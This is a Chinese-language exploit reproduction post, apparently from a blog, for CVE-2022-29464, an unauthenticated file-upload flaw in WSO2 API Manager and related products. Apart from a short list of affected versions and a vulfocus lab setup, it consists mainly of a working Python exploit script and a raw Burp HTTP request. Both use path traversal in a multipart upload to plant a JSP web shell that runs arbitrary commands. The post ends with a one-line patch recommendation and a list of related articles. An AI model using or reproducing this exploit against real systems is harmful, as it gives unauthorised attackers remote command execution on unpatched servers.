目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

vulfocus搭建:

0x06 漏洞复现:

1、EXP利用:

2、Burp改包:

0x07 流量分析:

0x08 修复建议:


0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

WSO2 是一个领先的开源 SOA 解决方案,包含了 SOA 相关的各种基础设施、技术框架和相关工具、流程 server、appserver 等。

0x03 漏洞概述:

近日,WSO2 官网发布关于 WSO2 API Manager 中存在任意文件上传和远程代码执行漏洞的信息。该漏洞是由于 WSO2 存在路由对输入的内容过滤不严格,攻击者可以利用该漏洞在未授权的情况下,构造恶意数据执行文件上传攻击,最终获取服务器最高权限。

0x04 影响版本:

2.2.0 ≤ WSO2 API Manager ≤ 4.0.0

5.2.0 ≤ WSO2 Identity Server ≤ 5.11.0

WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0

5.3.0 ≤ WSO2 Identity Server as Key Manager ≤ 5.10.0

6.2.0 ≤ WSO2 Enterprise Integrator ≤ 6.6.0

0x05 环境搭建:

vulfocus搭建:

((Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客)

浏览器访问:

0x06 漏洞复现:

1、EXP利用:

import requests
import urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)url = input("请输入URL:")
file = "shell.jsp"
payload = """<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");String output = "";if(cmd != null) {String s = null;try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) { output += s+"</br>"; }}  catch(IOException e) {   e.printStackTrace();   }}
%><pre><%=output %></pre>"""files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")

2、Burp改包:

POST /fileupload/toolsAny HTTP/1.1
Host: x.x.x.x:port
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");String output = "";if(cmd != null) {String s = null;try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) { output += s+"</br>"; }}  catch(IOException e) {   e.printStackTrace();   }}
%><pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

请求:https://192.168.119.155:56079/authenticationendpoint/1.jsp

0x07 流量分析:

由于是TLS加密数据包所以就做一下EXP的分析吧。

0x08 修复建议:

厂商已分别发布补丁修复漏洞,用户请尽快更新至安全版本。

官方下载地址: https://github.com/wso2/product-apim/releases

CVE-2022-29464 WSO2 任意文件上传漏洞复现相关推荐

  1. UEditor .Net版本任意文件上传漏洞复现总结

    UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...

  2. 畅捷通T+ v17任意文件上传漏洞复现

    1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...

  3. 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)

    0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...

  4. 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

    1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...

  5. 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

    文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...

  6. UEditor .Net版本任意文件上传漏洞复现

    目录   漏洞背景   漏洞影响   漏洞利用   漏洞分析   防御措施 漏洞背景 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器 漏洞影响 该漏洞影响UEditor的.N ...

  7. 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

    前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...

  8. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  9. 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

     聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...

最新文章

  1. JS简单实现自定义右键菜单
  2. sourcetree下回退
  3. Karpathy更新深度学习开源框架排名:TensorFlow第一,PyTorch第二
  4. em算法的java实现_EM算法 - Java教程 - 找一找教程网
  5. lvs之 lvs原理架构介绍
  6. java面向对象程序课本,Java面向对象程序设计
  7. OpenShift Security (1) - 红帽多集群安全管理 RHACS 的主要功能和技术架构
  8. wpf esc key 检测不到_爬虫笔记之requests检测网站编码方式(zozo.jp)(碎碎念) - CC11001100...
  9. [中等]寻找缺失的数
  10. puppet详解(四)——package资源详解
  11. wireshark过滤指定ip的数据包
  12. 深度Q学习——从入门到实践
  13. Lattice Diamond 3.12下载与安装(免费获取license.dat)
  14. 自己动手做Arduino玩具(二)
  15. Visual Studio 2013下载及其安装
  16. #UML# Astah+Doxygen 将C++源码映射为类图
  17. dhcp authoritative参数作用
  18. C/C++ Linux 键盘检测
  19. sql查询结果加上序号
  20. 极限和连续+偏导+方向导数+可微+梯度+链式法则+hessian矩阵

热门文章

  1. 电脑的组成与底层原理(CPU)
  2. 说明白正反向代理,以及Nginx和Gunicorn
  3. des 加密 iOS
  4. 使用VS C#实现距离的计算(点点、点线、点面、线面、线线、面面)
  5. multi-kernels、ALLOC与USE、Zero-Copy
  6. Java开发环境搭建-win10
  7. Jodd-Java的瑞士军刀 demo
  8. 前端行业发展和职业规划
  9. php7安装详解(windows环境)
  10. 如何系统的学习Python?